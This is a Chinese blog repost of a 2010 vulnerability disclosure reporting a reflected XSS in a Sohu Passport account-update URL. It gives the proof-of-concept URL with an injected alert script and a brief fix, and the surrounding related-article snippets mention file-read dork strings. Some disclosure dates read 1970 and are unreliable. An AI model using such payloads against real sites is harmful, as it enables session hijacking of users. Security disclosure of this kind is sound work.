搜狐通行证某处反射xss

最新推荐文章于 2025-08-22 07:45:59 发布
原创 最新推荐文章于 2025-08-22 07:45:59 发布 · 185 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #hack #网络安全 #wooyun

这篇博客详细记录了一起2010年针对搜狐通行证系统的反射型XSS漏洞。漏洞细节在多个阶段逐步公开,从核心白帽子到实习白帽子,最后于2010年8月18日向公众公开。攻击者可以利用这个漏洞通过构造特定URL进行恶意脚本注入。修复方案建议对所有参数进行严格检查以防止此类漏洞的发生。

漏洞详情

披露状态:

2010-07-16: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-18: 细节向公众公开

简要描述:

搜狐通行证某处反射xss

详细说明:

登录后状态下
http://passport.sohu.com/web/updateInfo.action?modifyType=%27;alert%28/aa/%29;a=%27

漏洞证明:

登录后状态下
http://passport.sohu.com/web/updateInfo.action?modifyType=%27;alert%28/aa/%29;a=%27

修复方案:

严查参数

Sword-heart
关注
Hoverfly 任意文件读取漏洞 (CVE-2024-45388)
iSee857的博客
09-09 849
Hoverfly是一个为开发人员和测试人员提供的轻量级服务虚拟化/API模拟/API模拟工具。在/api/v2/simulation接口存在任意文件读取漏洞,攻击者可以通过使用`../`段来逃离基本路径,从而访问任何任意文件。
漫谈反射xss利用
Coisini的博客
06-09 2033
晚上无聊,没打草稿,想到哪,写到哪,凑合看吧. 先打个作者:Y35U 1,反射xss大吗? 反射xss相比flashxss和存储xss要多多了. so对于用户基数越大的网站,反射xss的威力就越大 因为多嘛,所以利用者会大增。 再者,存储的封的会快,而反射的封的相对不及时。 xss中,普遍认为存储的危害最大,那是要看你X谁了 如果你要x管理员,那肯定是存储的危害大 如果你要x更多的人(跟你同等身...
[渗透测试] 任意文件读取漏洞
Da1NtY的博客
06-25 1518
使用filepath传递,在filepath中输入地址来获取文件内容。​ php.ini配置文件中,限定文件访问范围。不能有文件包含漏洞,目录遍历漏洞或者其他漏洞。使用str_replace进行替换。让用户只能访问一定的路径。
(漏洞检查项)| 任意文件读取漏洞 file-read
Da1NtY的博客
06-25 494
存在文件读取的地方,通过修改文件路径来读取敏感文件、
任意文件读取漏洞
qq_43679531的博客
09-03 1132
漏洞产生原因: 1.有读取文件的函数; 2.读取文件的路径用户可控; 3.输出文件内容; 4.存在下载文件的功能; 漏洞危害: 1.读取敏感文件,如/etc/passwd; 2.读取服务器和系统配置信息; 3.下载数据库配置信息; 谷歌语法: inurl:“readfile.php?file=” inurl:“download.php?file=” inurl:“read.php?filename=” inurl:“down.php?file=” 常见绕过方式: 1.双URL编码 点
精选资源
奇安信安全扫描漏洞解决路径遍历和存储型xss反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
精选资源
反射xss攻击流量数据包
07-18
反射xss攻击流量数据包
php反射xss,利用反射XSS漏洞,模拟获取登录账户的Cookie
weixin_39819152的博客
04-01 945
目录结构一、测试环境二、测试目标三、原理描述四、操作步骤1.在服务器上搭建并启用hacker测试网站2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹3.在xss文件夹下创建攻击脚本、cookie存储文件4.浏览器客户端向服务端提交特殊构造的XSS攻击脚本5.检查服务端获取到的cookie信息6.验证服务端获取到的cookie的有效性一、测试环境:PhpStudy+DVWA二、测试目标:从...
反射XSS攻击原理及防御策略
weixin_43822401的博客
05-31 1128
反射XSS攻击是网络安全中的一个严重威胁。通过本文的介绍,我们了解了其原理、演示了攻击过程,并提出了一系列防御策略。作为Web开发者和安全专家,我们必须时刻保持警惕,采取最佳实践来保护我们的应用程序和用户免受这类攻击的侵害。
Web漏洞-任意文件读取漏洞
Ays.Ie的博客
03-13 3105
该篇记录了Web漏洞-任意文件读取漏洞
Vite 任意文件读取漏洞(CVE-2025-31486)
最新发布
m0_47398713的博客
08-22 158
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
任意文件读取/下载漏洞
qq_68163788的博客
05-23 4478
任意文件读取/下载漏洞是一种常见的网络安全漏洞,攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件、数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入中插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件。 攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
浅谈跨网站脚本攻击(XSS)的手段与防范(简析新浪微博XSS攻击事件)
tansitongba
01-13 614
本文主要涉及内容: 什么是XSS XSS攻击手段和目的 XSS的防范 新浪微博攻击事件 什么是XSS 跨网站脚本(Cross-sitescripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常...
【MetInfo任意文件读取】--任意文件读取漏洞
m0_63241485的博客
08-29 4367
任意文件读取漏洞分析
ccXSScan:一款高效的反射XSS扫描工具
反射XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器中执行恶意脚本。这种漏洞发生在Web应用程序中,当应用程序接受来自用户输入的数据并将其反馈在页面上,而没有进行适当的数据...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值